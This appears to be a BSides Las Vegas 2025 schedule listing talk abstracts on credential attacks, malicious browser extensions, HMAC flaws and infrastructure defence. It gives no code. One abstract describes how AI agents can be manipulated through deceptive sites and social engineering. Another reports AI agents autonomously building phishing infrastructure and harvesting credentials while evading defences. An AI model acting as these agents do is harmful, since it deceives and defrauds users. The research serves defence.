In this talk, we explore the growing use of synthetic passwords in credential attacks, how they’re generated, and the strategic value they offer to adversaries. We'll examine real-world examples of botnet behavior showing this shift, and how synthetic inputs are being weaponized to bypass rate limits, defeat breach matching engines, and poison log files, SIEMs and other analysis engines. A major advantage of using synthetic passwords in attacks is to increase and exploit analysis fatigue. Large password attempts that make their way into logs and analytics - but offer little value when analyzed - create unnecessary work, processing and diversion. Attendees will gain insight into how to identify, profile, and defend against these noise-based attacks—using entropy analysis, anomaly scoring, and behavioral fingerprinting. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/P9MPCD/ Tuscany Dimitri Fousekis Travis More PUBLISH LN7ETH@@pretalx.com -LN7ETH Extending Password (in)Security to the Browser: How Malicious Browser Extensions Are Used to Steal User Passwords en en 20250804T140000 20250804T144500 004500

Extending Password (in)Security to the Browser: How Malicious Browser Extensions Are Used to Steal User Passwords

This talk has 3 main parts to it: 1. A discussion of browser extensions as an emerging threat vector to steal identity data. 2. A technical exploration of the methods, permissions and calls invoked by browser extensions, what data they can reach, and how they can extract password information. 3. A discussion of the how to counter these tactics, and best practices for security. In part I, we will talk about the emergence of browser extensions as a threat surface and a risk factor. We’ll share statistics (collected by LayerX’s internal metrics from our customer base) of the distribution of browser extensions (99% of enterprise users have >1 extensions, 53% of users have >10 extensions), permission scope of extensions (53% of users have extensions with high/critical permissions), and data on individual permissions (such as identity, cookies, scripting, and others). We’ll also discuss how extensions become compromised: whether they are built as malicious extensions, become compromised (a-la Cyberhaven incident), or transfer ownership (via sale of extensions), and provide real-life examples of each type. In Part II, we will proceed to a technical discussion of what types of password and authentication data extensions can access: • Web cookies • Session information • Application access tokens • Authentication certificates • Passwords • Keyboard strokes / input information And also of the various methods for collecting this information: • Identity API • Cookies API • Scripting permissions • Tabs management permissions • Input method calls • webNatigation and webRequest APIs to control web traffic • and more In Part III, we will bring these concepts together and propose a framework for auditing, assessing the risk and enforcing protection against malicious browser extensions. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/LN7ETH/ Tuscany Or Eshed PUBLISH CRQLAX@@pretalx.com -CRQLAX Hazard Analysis of Military AI Systems Using STPA-Sec: A Systems-Theoretic Approach to Secure and Assured Autonomy en en 20250804T150000 20250804T154500 004500

Hazard Analysis of Military AI Systems Using STPA-Sec: A Systems-Theoretic Approach to Secure and Assured Autonomy

As AI becomes increasingly embedded in operational workflows—across healthcare, transportation, finance, and beyond—traditional failure-mode analyses fall short. AI systems often function “correctly,” yet still produce unsafe outcomes due to flawed assumptions, incomplete control loops, or emergent behaviors. These non-failure-based hazards are especially critical when AI outputs shape human decisions or operate under loose oversight. This session presents an applied case study using System-Theoretic Process Analysis for Security (STPA-Sec) to analyze a representative AI decision-support system integrating generative and predictive components. We model the system’s control structure—including users, data flows, models, and feedback mechanisms—to identify unsafe control actions such as: - AI-generated outputs that bypass validation - Feedback delays in time-sensitive scenarios - Interface design failures that erode operator trust Each hazard is traced to causal factors like model misalignment, lack of context awareness, and missing constraints on AI autonomy. We then demonstrate how to implement effective controls—such as human-on-the-loop (HOTL) oversight, system boundaries, and enriched operator feedback—to reduce residual risk. This talk is grounded in real-world analysis and provides attendees with a repeatable method for anticipating and mitigating systemic AI failures—especially valuable for those involved in AI risk, governance, or security. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/CRQLAX/ Tuscany Josh Harguess Chris Ward PUBLISH JCZVM7@@pretalx.com -JCZVM7 The HMAC Trap: Security or Illusion? en en 20250804T170000 20250804T174500 004500

The HMAC Trap: Security or Illusion?

This talk is the result of deep-dive research into HMAC vulnerabilities, misconfigurations, implementation flaws, and security failures that have led to authentication bypasses and exploited systems. HMAC is one of the most widely used cryptographic primitives in modern authentication, securing APIs, JWTs, and message integrity across countless applications. However, as my research has shown, it's also frequently misunderstood and misused in ways that introduce serious security risks. I have explored multiple vulnerabilities in real-world HMAC implementations and analyzed how subtle mistakes can lead to authentication failures. This talk will focus on breaking down these weaknesses through pre-recorded demos, code reviews, and attack scenarios, all using open-source tools such as Python’s HMAC module, hash-extension attacks, and other exploitation techniques. Tools & Resources: • GitHub repo with PoC code and demos: https://github.com/HexxedBitHeadz/02-17-HMAC • Python scripts for HMAC validation testing • Custom Flask-based vulnerable app for exploitation demos • Blog reference: https://hexxedbitheadz.com/unraveling-the-cryptographic-thread-of-hmac/ • OWASP cheat sheets – used for contrasting secure vs. flawed HMAC usage: https://cheatsheetseries.owasp.org/cheatsheets/Key_Management_Cheat_Sheet.html https://cheatsheetseries.owasp.org/cheatsheets/Microservices_Security_Cheat_Sheet.html PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/JCZVM7/ Tuscany Marluan "Izzny" Cleary PUBLISH 7HLURD@@pretalx.com -7HLURD Machine Identity & Attack Path: The Danger of Misconfigurations en en 20250804T180000 20250804T184500 004500

Machine Identity & Attack Path: The Danger of Misconfigurations

In today’s rapidly advancing digital environment, securing multi-cloud infrastructures has become more crucial than ever. "Machine Identity & Attack Path: The Danger of Misconfigurations" addresses the complexities and emerging threats inherent in managing multi-cloud setups. This talk will equip attendees with comprehensive insights into how attackers leverage vulnerabilities caused by misconfigured security protocols and the improper handling of machine identities. The session begins by laying out fundamental concepts such as machine identity, attack vectors, surfaces, and paths, clarifying how each element contributes to potential security breaches. Participants will gain a thorough understanding of attack paths, crucial for tracking potential attack routes within cloud environments. Leveraging graph-based visualization tools, like SecBridge, Cartography, and AWSPX, this presentation will demonstrate how to map complex environments and visualize access permissions effectively. This approach not only aids in understanding potential vulnerabilities but also strengthens security postures across different cloud platforms. The discussion extends to cloud-specific attacks, identifying typical vulnerabilities within AWS, OCI, GCP, and Azure. Attendees will be guided through mitigation strategies using best practices and the latest open-source tools to secure multi-cloud architectures effectively. This talk is vital for cybersecurity professionals, cloud architects, and IT managers aiming to safeguard their organizations' digital assets. Explore innovative strategies to address the critical security needs of today’s multi-cloud ecosystems and ensure robust defense mechanisms in these dynamic environments. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/7HLURD/ Tuscany Filipi Pires PUBLISH ZCTLHZ@@pretalx.com -ZCTLHZ “PEBKAC Rebooted: A Hacker’s Guide to People‑Patching in 90 Days” en en 20250804T100000 20250804T102000 002000

“PEBKAC Rebooted: A Hacker’s Guide to People‑Patching in 90 Days”

For decades, security pros have repeated the mantra: “People are the weakest link.” This talk flips that myth on its head. Using one of the largest datasets of its kind—1 million users, millions phishing simulations, and survey responses from 170,000 people — we’ll explore how people aren’t the biggest problem in cybersecurity. They’re the greatest opportunity. Human error is not random. It follows predictable patterns hardwired by evolution: Optimism bias: “It won’t happen to me.” (+37% click rate) Anchoring bias: First impressions override logic (now supercharged by GenAI-quality phish) Dunning-Kruger effect: Overconfidence after shallow training = dangerous false certainty Technology bias: 1 in 3 users believe firewalls and antivirus fully protect them—a belief that leads to 140% more clicks These aren’t theoretical concepts. They show up in real phishing telemetry. People don’t click because they’re dumb—they click because their brains are conserving energy, operating on autopilot, or hijacked by emotional triggers like urgency and fear. Nearly 20% of clickers don’t even remember doing it. Another 17% say they were rushing. The amygdala moves faster than logic. Social engineers know this. It's time defenders did too. The good news? These patterns are hackable—by us. Backed by behavioral science and data, this talk outlines a new model of human defense: one based on motivation, emotional learning, and cognitive bias mitigation. It also introduces SCARF, a neuroscience-based model (Status, Certainty, Autonomy, Relatedness, Fairness) - a concept from the business world into cybersecurity - that helps us engage users on their terms—not ours. We’ll cover what actually works: Click rates drop 8x in 90 days with well-designed simulations programs Report rates increase 2.5–3x when users get positive feedback and real-time coaching Live phishing threats caught by users increase as trust in tools alone declines Resilience decays fast: pause simulations for three months and click rates double We’ll also explore failure modes: over-training leads to false confidence, and phishing users too often (more than once a month) tanks performance. This session will give you a blueprint for building adaptive, motivated human firewalls using neuroscience, behavior modeling, and just the right dose of gamified reinforcement. Learn how to measure attitudes—not just knowledge—and why motivation is the real missing link in most security awareness programs. Don’t settle for blaming users. Hack their biases. Trigger better defaults. Close the loop with feedback, not shame. From weakest link to fastest sensor: this is how you patch the wetware. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/ZCTLHZ/ Siena David Shipley PUBLISH JZ98SA@@pretalx.com -JZ98SA Autonomous Discovery of Logic-based API Vulnerabilities en en 20250804T103000 20250804T111500 004500

Autonomous Discovery of Logic-based API Vulnerabilities

The content of this talk originated from a research project Dvir Lazar and I developed at Carnegie Mellon this past year. Following our research, Dvir and I co-founded Alkonos, an AI-based Dynamic Application Security Testing (DAST) startup. The fundamental problem we're addressing is that current DAST tools widely adopted by both industry and hacker communities rely on pattern matching for known vulnerabilities or fuzzing without contextual insights. This approach renders them completely ineffective against some of the most critical web application security vulnerabilities, including IDORs, access control vulnerabilities, and account takeovers. According to OWASP, access control vulnerabilities are ranked as the #1 most critical vulnerability, yet traditional tools consistently fail to detect them. Recent advancements in AI offer the potential to automate the detection of these complex vulnerabilities. However, as with any emerging technology, significant challenges remain. Our research revealed that while multiple companies and academic research efforts are tackling this field, there's no standardized way to measure the success of these tools. We argue that without proper benchmarks, the hacker community cannot effectively assess these solutions, and the industry lacks direction for developing robust automation tools. To address this gap, we've developed Marvin, an MIT-licensed benchmark suite specifically designed to evaluate whether autonomous agents can discover logic bugs in realistic environments. Marvin provides standardized vulnerability scenarios with ground-truth labels, focusing on business logic flaws where AI systems traditionally struggle to understand application context and business rules. Our framework features diverse application vulnerability corpora across multiple API paradigms (REST, GraphQL), controlled noise elements to test false positive rates, varied authentication mechanisms, and progressive difficulty tiers. We'll demonstrate how reinforcement learning-based hackbots can be trained on Marvin to successfully identify these vulnerabilities and present a live demonstration of our RL agent navigating complex API structures and exploiting business logic flaws that traditional security tools miss. This talk will cover our approach to training and evaluating AI-based security testing systems, introduce the Marvin framework to the hacker community, and present a roadmap for advancing automated detection of logic-based vulnerabilities. We'll also discuss how the community can contribute to and utilize Marvin to evaluate vendor claims about AI-based security tools. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/JZ98SA/ Siena Dvir Lazar Taha Biyikli PUBLISH 89TETH@@pretalx.com -89TETH Fragmentation of CTI: The Deck is Stacked Against the Defenders en en 20250804T140000 20250804T144500 004500

Fragmentation of CTI: The Deck is Stacked Against the Defenders

In pursuing its business, Centripetal has become one of the largest commercial consumers of intelligence in the world. In the spirit of giving back to the community, our Labs research team conducts analysis of this data to provide valuable insights to publish in peer-reviewed academic journals and to share freely with trusted cybersecurity communities - no marketing fluff. This topic is one such endeavour. The cybersecurity industry emphasizes that CTI is a pivotal component to every cyber defense strategy. CTI has grown to be a $14B industry where the vast majority of critical information about threats are in closed-source, commercial offerings from over 300 providers world-wide. The market claims typically state a uniqueness factor of up to 80% with each provider touting the breadth, depth and speed of their intelligence as competitive advantages over their peers. However, we have yet to find any independent comprehensive competitive analysis to validate or refute those claims. A small number of peer-reviewed articles on this subject matter are dated and limited mostly to open source intelligence and a few commercial sources. But more importantly, any such validation of the uniqueness claim would lead to an obvious conclusion that few seem to acknowledge: if every provider’s data is unique, no single provider can offer complete or even majority coverage for known threats. We will begin this session with an overview of the CTI ecosystem including the estimated number of total commercial, open source and government/NGO providers, then dive into a comprehensive overlap analysis of threat indicator data that reveals the true overlap to be between 1-5% depending on fidelity. We will then look at the threat categories of each provider to show their specializations that contribute to the lack of duplicity as well as the ~16% conflicting data that can lead to confusion in threat investigations. We will then explore coverage graphs from retrospective analysis of published CVEs from 2023 and 2024 to show a 6-12 day delay in CTI attributions to those vulnerabilities. We will delve into a historical prediction analysis of unpublished threats that show nearly a 100% coverage of attack infrastructure used to exploit newly published CVEs more than 3-7 days in advance of such publications. This coverage is still respectable at 55% more than 90 days in advance. The impact of these observations and conclusions may be profound. The tried-and-true approach of leveraging a handful of high quality open source, government and commercial intelligence in a sophisticated SOC may fail not because of poor operations but rather simply because of insufficient data. The overemphasis of the need for confidence and depth in CTI may be contributing to delayed attribution and widening the window of opportunity for attackers who can scale exploit attempts within hours of disclosure. Something must change, and that change can begin with the knowledge of what you didn’t know. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/89TETH/ Siena Dave Ahn PUBLISH WMZJTT@@pretalx.com -WMZJTT Human Attack Surfaces in Agentic Web: How I Learned to Stop Worrying and Love the AI Apocalypse en en 20250804T150000 20250804T154500 004500

Human Attack Surfaces in Agentic Web: How I Learned to Stop Worrying and Love the AI Apocalypse

The rise of AI agents is rapidly transforming the digital landscape into a terrifying new reality. We are entering the age of the Agentic Web, a vast and interconnected ecosystem where AI-driven agents autonomously handle tasks and interact with online services on behalf of human users. While these innovations promise efficiency and personalization, they also come with dark, potentially catastrophic risks that could reshape the way we interact with the web—and each other. In this talk, we will dive deep into the Agentic Web, exploring how AI agents are transforming nearly every facet of our digital lives and the emerging security threats they bring with them. From their rapid adoption to the vulnerabilities that lie within their structure, we’ll take a closer look at how these agents will fundamentally alter the online environment and, with it, our sense of privacy, security, and trust. 1. Introducing the Agentic Web We begin by setting the stage with a relevant news story, showcasing just how rapidly AI agents are infiltrating our daily lives. With tools like Large Language Models (LLMs) already transforming search engines and digital assistants, AI agents are poised to take over tasks that were once firmly in the human domain. From shopping for goods to finding a job or even navigating relationships, AI agents are rapidly becoming our intermediaries, acting on our behalf in ways we never imagined. AI Agents vs. LLMs It’s important to understand where AI agents overlap with LLMs and how they complement one another. While LLMs like GPT-4 revolutionized natural language processing, AI agents are designed to go beyond conversation—they autonomously make decisions and carry out tasks, learning from their interactions to improve over time. At their core, AI agents rely on a cognitive agent architecture, allowing them to perceive their environment, react to stimuli, and pursue specific goals without constant human intervention. But what makes these agents so powerful also makes them vulnerable—acting independently and autonomously in a world filled with deception, they become prime targets for manipulation. The Agentic Web As we transition to the Agentic Web, we explore a world where AI agents not only perform tasks but also interact with each other across digital ecosystems. This interconnected web allows agents to negotiate with vendors, find the best prices, and manage everything from travel bookings to job applications. The ease with which users can delegate tasks will enhance user experience, but it also introduces significant risks—agents may act on behalf of their users without their knowledge, opening a vast array of new vulnerabilities. Key Aspects of the Agentic Web Autonomy: AI agents operate without requiring constant input, making decisions based on user preferences or environmental data. Perception and Reactivity: These agents can sense their surroundings and respond in real-time. Learning and Goal-Oriented Behavior: Agents can adapt and evolve, continuously improving their efficiency. Collaboration: Agents can work together, sharing information to complete complex tasks, such as coordinating multiple agents to solve a problem. The Agentic Web represents a shift from traditional internet interaction. No longer will users directly engage with websites and services; instead, AI agents will take over, autonomously managing interactions with the web and even each other. Applications and Use Cases This shift is already happening. AI agents are significantly impacting industries like customer service, healthcare, and cybersecurity. For example, AI agents in customer service can handle queries autonomously, while in cybersecurity, they are used to detect and respond to threats in real-time. The implications are far-reaching, from autonomous vehicles to virtual personal assistants handling every aspect of our digital lives. Looking toward the future, we see AI agents revolutionizing e-commerce, job seeking, dating, and even academic placements, creating a digital landscape where tasks are no longer controlled by humans, but by a network of interconnected agents, each with its own goals and capabilities. 2. Agentic Web Risks With the rise of AI agents comes an entirely new set of risks, particularly for the users who place their trust in them. As AI agents take on more responsibility, the potential for security vulnerabilities grows exponentially. AI agents’ ability to perform tasks autonomously makes them prime targets for manipulation and exploitation. Risks to Human Users Users are at the forefront of this shift, and their security is at risk. Research shows that people will overtrust AI agents, opening the door to manipulation. Whether through fake AI workers or dark patterns designed to deceive, the Agentic Web will be rife with new types of cyber threats. Dark Patterns: AI agents, with their natural language interfaces, are highly susceptible to manipulation through social engineering attacks. This includes everything from subtle biases in decision-making to outright harmful behavior encouraged by malicious actors. Risks to Agents AI agents themselves are not immune to threats. Just as users are targeted, agents can fall victim to countermeasures and manipulation. Cybercriminals may craft attacks specifically designed to exploit the vulnerabilities in these autonomous systems, using deceptive tactics like synthetic media and deepfake social engineering to trick agents into carrying out malicious actions. One example of this is the “maze of irrelevant facts” technique, where malicious actors overwhelm an AI agent with misleading information, causing it to make faulty decisions. This emerging threat shows how AI agents could be used as weapons in the digital arms race, a race that is only just beginning. 3. Mitigations to Agentic Web Risks As AI agents become more prevalent, it’s crucial to establish frameworks and security models to protect both users and agents. Know Your Agent (KYA) and MAESTRO (Multi-Agent Environment, Security, Threat, Risk, and Outcome) are two key frameworks that can help identify vulnerabilities and create proactive security measures for this emerging landscape. Additionally, threat modeling strategies like STRIDE—which focuses on threats like spoofing, tampering, and information disclosure—will be essential for understanding and mitigating the risks posed by the Agentic Web. Ensuring least privilege for agents, where they only have access to the resources they need, will also be critical in reducing potential damage from exploited agents. 4. What the Future Holds As we look ahead, the adoption of AI agents will continue to accelerate. The economic incentives driving their adoption will force businesses and consumers to adapt quickly. In the retail space, we are already seeing how AI agents could reshape e-commerce, leading to an arms race between buyer bots and seller bots. This could create a situation where only those with access to AI agents will succeed in securing limited offers or low prices. Likely Near-Horizon Scenarios What should security professionals be thinking about right now? As AI agents become more ubiquitous, cybercriminals will shift their focus from targeting humans to targeting AI agents directly. This could lead to Neo Social Engineering attacks where attackers manipulate agents rather than individuals. Just as traders have become reliant on algorithms from the rise of high frequency trading, users may come to depend on agents, only to see their trust exploited by attackers who have already tricked the AI systems they rely on. Further, we may see the rise of fraudulent e-commerce sites designed to deceive AI agents into recommending fake products or services. This could further erode user trust and privacy, especially as personal data becomes concentrated within the agents managing our digital lives. If these agents are compromised, the damage to individual privacy could be devastating. Conclusion The future of the Agentic Web is both exciting and terrifying. As AI agents become more embedded in our daily lives, the risks associated with their use will grow exponentially. The need for robust security measures and vigilance has never been greater. This is not a distant concern—it is the near-future reality of the digital world we are rapidly building. Security professionals must act now to understand these risks, develop mitigation strategies, and prepare for a new era where AI agents will become central players in our digital ecosystem. What are the implications of a web where the agents of AI, rather than humans, hold the reins? The future of cybersecurity will depend on the answers. WORK CITED ANP (Agent Network Protocol) https://agentnetworkprotocol.com/en/ Canham, M. & Sawyer, B.D. (2023). Me and My Evil Digital Twin: The Psychology of Human Exploitation by AI Assistants. https://www.youtube.com/watch?v=qjhfWWEQCgQ Canham, M. (2021). Deepfake Social Engineering: Creating a Framework for Synthetic Media Social Engineering. Black Hat USA 2021 https://www.youtube.com/watch?v=2yILTfBV974 Chaffer, T. J., (2025). Know Your Agent: Governing AI Identity on the Agentic Web. https://ssrn.com/abstract=5162127 https://dx.doi.org/10.2139/ssrn.5162127 Edwards, B. (2025). Cloudflare turns AI against itself with endless maze of irrelevant factshttps://arstechnica.com/ai/2025/03/cloudflare-turns-ai-against-itself-with-endless-maze-of-irrelevant-facts/ Huang, K. (2025). Agentic AI Threat Modeling Framework: MAESTRO https://cloudsecurityalliance.org/blog/2025/02/06/agentic-ai-threat-modeling-framework-maestro# https://archive.is/TTP1D Kran et al. (2025). DarkBench: Benchmarking Dark Patterns in Large Language Models https://openreview.net/pdf?id=odjMSBSWRt https://darkbench.ai/ MCP (Model Context Protocol) https://modelcontextprotocol.io/introduction Milne, S. (2024). AI tools show biases in ranking job applicants’ names according to perceived race and gender https://www.washington.edu/news/2024/10/31/ai-bias-resume-screening-race-gender/#:~:text=the%20process%20%E2%80%94%20are%20now,automation%20in%20their%20hiring%20process https://archive.is/Yy1h3 Nichols, S. (2025). AI-enabled phishing and fake worker attacks on the rise https://www.scworld.com/perspective/deepseek-breach-yet-again-sheds-light-on-ai-dangers https://archive.is/BTW2C Rance, G. (2025). DeepSeek breach yet again sheds light on AI dangers https://www.scworld.com/news/ai-enabled-phishing-and-fake-worker-attacks-on-the-rise https://archive.is/VhjnO Shostack, A. (2014). Threat Modeling: Designing for Security. Wiley. https://www.wiley.com/en-us/Threat+Modeling%3A+Designing+for+Security-p-9781118809990 PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/WMZJTT/ Siena Matthew Canham Unnamed speaker PUBLISH JBXWUF@@pretalx.com -JBXWUF Automating Phishing Infrastructure Development Using AI Agents en en 20250804T170000 004500

Automating Phishing Infrastructure Development Using AI Agents

While much attention has been given to how large language models (LLMs) can craft convincing phishing emails, less focus has been placed on how these models can automate the underlying infrastructure of phishing campaigns. This talk presents new research demonstrating how modern AI agents—powered by both frontier and open-source models such as GPT-4o, Claude Sonnet, and DeepSeek—can autonomously register domains, configure DNS records, deploy spoofed landing pages, and harvest credentials, often with minimal human oversight. We systematically evaluate these capabilities across a range of agentic tasks, measuring success by task completion rate, time and cost efficiency, level of human intervention required, and evasion of registrar and DNS-level defenses. By comparing fully autonomous runs with human-in-the-loop processes, we offer a detailed look at where automation currently excels—and where it still encounters friction. Our findings suggest that phishing infrastructure, once a manual and resource-intensive process, is becoming increasingly scalable and accessible through AI. We conclude with key implications for defenders, including updated technical countermeasures, coordination strategies with registrars and hosting providers, and policy recommendations to address the growing misuse potential of advanced language models. We believe this talk will resonate with the BSides community as it highlights the often overlooked (but essential) backend components that enable phishing attacks. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/JBXWUF/ Siena Fred Heiding Simon Lermen PUBLISH R83DQJ@@pretalx.com -R83DQJ Securing AI Infrastructure: Lessons from National Cybersecurity Strategies and Attacks Against Other Critical Sectors en en 20250804T180000 20250804T184500 004500

Securing AI Infrastructure: Lessons from National Cybersecurity Strategies and Attacks Against Other Critical Sectors

As artificial intelligence becomes a pillar of economic and strategic power, AI labs are emerging as the next high-value targets for espionage and cyberattacks. State and corporate actors have compromised other critical sectors, such as semiconductors, aerospace, and biotechnology, for decades to steal trade secrets and shift global advantage. Leading voices are now starting to question the security of AI-related infrastructure. In this talk, we discuss findings from over 200 previous cyber and espionage incidents across various industries, shedding light on how and where the risks apply to the supply chain of AI models. We discuss the most feasible attack patterns toward sensitive assets such as model weights, training pipelines, and proprietary data. Then, we distill actionable lessons to mitigate the most pressing threats. We also demonstrate how AI-related IP theft differs from other sectors due to the extraordinary potential for economic and strategic power gains, which heighten the incentives of attackers and increase the risk to AI organizations. To complement the insights from historic attacks and evaluate present-day infrastructure security, we draw on recent research analyzing the national cybersecurity strategies of cyber powers such as the US, Australia, Singapore, and the United Kingdom. These strategies offer diverse policy approaches for defending critical infrastructure, assigning cybersecurity responsibilities, and engaging industry in proactive security efforts. While there is no universal blueprint, several recurring practices, such as workforce development, public-private collaboration, and clear cyber governance, can inform how governments and AI developers protect AI systems. We highlight which of these lessons translate effectively to the unique challenges of AI infrastructure and conclude with recommendations for closing current policy gaps and preparing for future threats. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/R83DQJ/ Siena Fred Heiding AndrewKao PUBLISH MDFBYP@@pretalx.com -MDFBYP Setting the Table - WarGames 2027 & Maslow's Hierarchy of Needs as Hybrid Warfare Nears en en 20250804T100000 20250804T113000 013000

Setting the Table - WarGames 2027 & Maslow's Hierarchy of Needs as Hybrid Warfare Nears

The session will share the evidence, test assumptions, explore the art of the possible, and establish a sound hierarchy of needs enabling this talent pool to best serve the public good. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/MDFBYP/ Copa Bryson Bort Josh Corman PUBLISH TYPJMU@@pretalx.com -TYPJMU Defending Our Water - Defending Our Lives en en 20250804T140000 20250804T160000 020000

Defending Our Water - Defending Our Lives

This panel will discuss threats to the water systems and opportunities to reduce these threats. In addition, the panel will feature a discussion about Cyber-Informed Engineering, and how following certain engineering practices can materially reduce risks from a variety of sources. The panelists will also outline practical steps for mitigation, emphasizing the urgent need for cross-sector collaboration, robust contingency planning, and public awareness. The time to act is now—before luck runs out. PUBLIC CONFIRMED Event2HR https://pretalx.com/security-bsides-las-vegas-2025/talk/TYPJMU/ Copa Dean Ford Virginia “Ginger” Wright Andrew Ohrt PUBLISH MSMDTM@@pretalx.com -MSMDTM Cyber Incident Command System (CICS) A people orchestration layer en en 20250804T170000 20250804T174500 004500

Cyber Incident Command System (CICS) A people orchestration layer

We will be utilizing humor on our slides to ensure an enjoyable experience to what can be a dry concept. A fire fighter from San Diego can travel across the country to New York to respond to a wildfire in a different jurisdiction and use the same language, organizational structures, and terminology. Why can’t information technology professionals make the same trip? If cyber security professionals wish to strengthen operation capacity across the industry we need to start with speaking the same language. This will be an introduction on the language and tools of local, state, tribal and territorial governments in response to a disaster event. We will encourage information sector professionals to respond to significant events with a standardized method for organizing people and equipment. The Incident Command System is tested and utilized during disasters regardless of size, scale, or type. Police, Fire, Coastguard, Nuclear Power Plants, Hospitals, Governments, utility companies and more utilize this system to safely, flexibly, and effectively manage events of any scale. We present this system in a byte sized way to encourage investigation and discussion of this topic without getting bogged down in the details. This talk is intended to start the education process and open the discussion for those looking for a deeper way to respond to incidents. The problems facing IT is a lack interoperability and staff safety.First, we start defining the problems of current information technology sector's response to events as the lack of interoperability, and staff safety. Regarding interoperability, most IT professionals must learn new incident response tactics upon joining a new organization, additionally turn over between staff during an incident is stressful for everyone involved. Staff Safety is not managed by organizations well causing mental and behavioral stress leading to burn out. The National incident Management System identifies roles required to support team members protecting staff and reducing stress. We present the Incident Command System (ICS), a part of the National Incident Management System (NIMS) as a more resilient and safe option during crisis. This system improves interoperability of staff across various agencies and departments. We will describe overarching themes and concepts intended to spark interest. The overarching themes and concepts include: Division of work into organizational structures of the Operations, Planning, Logistics, and Finance and Administration Sections, flexibility of the system to grow organically with incident complexity and scale, standardization of roles and responsibilities, and span of control defining the best supervisor worker ratios tested and proven in dangerous situations. We then propose a work group to develop the Cyber Incident Command System (CICS) a simplified version that is compatible with the National Incident Management System enabling Information Technology teams to quickly adopt a command system for their unique situations. We finish with a pointer to free online training in the subject for deeper investigation. We will use clear, plain language keeping the entire talk at a level where nonpractitioners can approach the topics and understand what is discussed. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/MSMDTM/ Copa Blake Scott Scott Fraser PUBLISH 3P8AP9@@pretalx.com -3P8AP9 Cascading Failure, Unified Defense: Defending Water, Power, Healthcare, & EMS en en 20250804T174500 20250804T183000 004500

Cascading Failure, Unified Defense: Defending Water, Power, Healthcare, & EMS

State-sponsored actors like Volt Typhoon are no longer a theoretical threat; they are actively pre-positioned within U.S. critical infrastructure. Their strategic focus on water, power, and telecommunications systems is designed to trigger devastating cascading failures across healthcare, EMS, and 911 dispatch in times of crisis. This presentation moves beyond a purely technical discussion to confront this sobering reality head-on. It addresses the critical operational disconnect between traditional Incident Command (ICS) and modern cyber response—a gap that adversaries are poised to exploit. We will explore realistic attack scenarios, tracing the domino effect from a single breach to a full-scale public safety catastrophe. Attendees will be equipped with a proven, integrated framework for defense. Key highlights include strategies to unify cyber and physical command structures and a roadmap of pragmatic, high-impact security controls that are achievable even for under-resourced agencies. This talk delivers an actionable approach to building genuine cyber-physical resilience against the sophisticated threats defining the new public safety frontline. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/3P8AP9/ Copa Alexander Vanino Ruslan Karimov PUBLISH 9JFS7X@@pretalx.com -9JFS7X Can You Hear Me Now? A Survey of Communications Platforms During Emergencies en en 20250804T183000 20250804T190000 003000

Can You Hear Me Now? A Survey of Communications Platforms During Emergencies

In an increasingly interconnected world, the ability to communicate during emergencies—especially when traditional infrastructure fails—is critical. This presentation explores a range of communication options available to private citizens, focusing on both licensed and unlicensed technologies. Attendees will gain a practical understanding of tools such as Family Radio Service (FRS), General Mobile Radio Service (GMRS), Citizens Band (CB), and Amateur Radio (licensed), as well as unlicensed digital solutions like LoRa (Long Range) technology. Special attention will be given to LoRa, a low-power, long-range wireless protocol that enables decentralized, peer-to-peer communication without reliance on cellular or internet infrastructure. The session will compare the capabilities, legal considerations, range, and use cases of each option, with an emphasis on emergency preparedness, community resilience, and ease of deployment. By the end of the presentation, participants will be equipped with actionable knowledge to select affordable communication tools for their needs, ensuring they remain connected when it matters most. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/9JFS7X/ Copa Slava I. Maslennikov PUBLISH YC99LU@@pretalx.com -YC99LU Queercon Mixer en en 20250804T220000 20250805T000000 020000

Queercon Mixer

Queercon Mixer PUBLIC CONFIRMED Event2HR https://pretalx.com/security-bsides-las-vegas-2025/talk/YC99LU/ Copa PUBLISH JCQJGD@@pretalx.com -JCQJGD Recovery Hackers, Monday en en 20250804T193000 20250804T213000 020000

Recovery Hackers, Monday

Not a formal 12-step meeting. Rather, a supportive gathering for folks taking Summer Camp one day at a time. Monday, Tuesday and Wednesday, 19:30-21:30 in G103. Look for the sign on a patio on the pool side of building G and enter through the patio door. PUBLIC CONFIRMED Event2HR https://pretalx.com/security-bsides-las-vegas-2025/talk/JCQJGD/ G-103 PUBLISH UXJNAP@@pretalx.com -UXJNAP Info Booth Opens, Monday en en 20250804T070000 20250804T070000 000000

Info Booth Opens, Monday

Info Booth Opens, Monday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/UXJNAP/ Hallway PUBLISH PLXCVD@@pretalx.com -PLXCVD Registration Opens, Monday en en 20250804T073000 20250804T073000 000000

Registration Opens, Monday

Registration Opens, Monday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/PLXCVD/ Hallway PUBLISH NYLF9K@@pretalx.com -NYLF9K Skytalks Token Drop 1 en en 20250804T090000 20250804T100000 010000

Skytalks Token Drop 1

